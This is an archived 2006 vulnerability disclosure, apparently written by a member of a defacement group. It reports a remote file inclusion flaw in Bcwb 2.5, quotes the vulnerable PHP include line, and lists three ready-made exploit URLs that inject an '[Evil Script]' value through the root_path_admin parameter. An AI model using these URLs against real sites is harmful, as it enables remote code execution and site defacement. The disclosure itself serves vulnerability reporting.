Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14867
HistoryOct 31, 2006 - 12:00 a.m.

Multiple Remote File Include

2006-10-3100:00:00
vulners.com
16

####################### Firewall #########################
Bcwb 2.5 - Multiple File Include by Firewall
Latin American Defacers
BuG FounD by Firewall

Application Affect:

                Bcwb 2.5

Sorce Code:

     http://prdownloads.sourceforge.net/bcwb/bcwb_v25.zip?download

Code:

   if(! include($root_path_admin.'lang/'.$default_language.'.inc.php') ) die("Can't include ".$root_path.'lang/'.$default_language.'.inc.php');

ExPloit :

http://www.site.com/Bcwb_PATH/include/startup.inc.php?root_path_admin=[Evil Script]

http://www.site.com/Bcwb_PATH/dcontent/default.css.php?root_path_admin=[Evil Script]

http://www.site.com/Bcwb_PATH/system/default.css.php?root_path_admin=[Evil Script]

GrEatZ :LAD,C-group,Her0,slackwaren,slappter,Cvir.System,Hanowars,ANtrAX

,napster,saok,Zlevyn,FaLENcE,Azrael,CyberAlexis,krhonoz,RaDaM4nTySS.

####################### Firewall #########################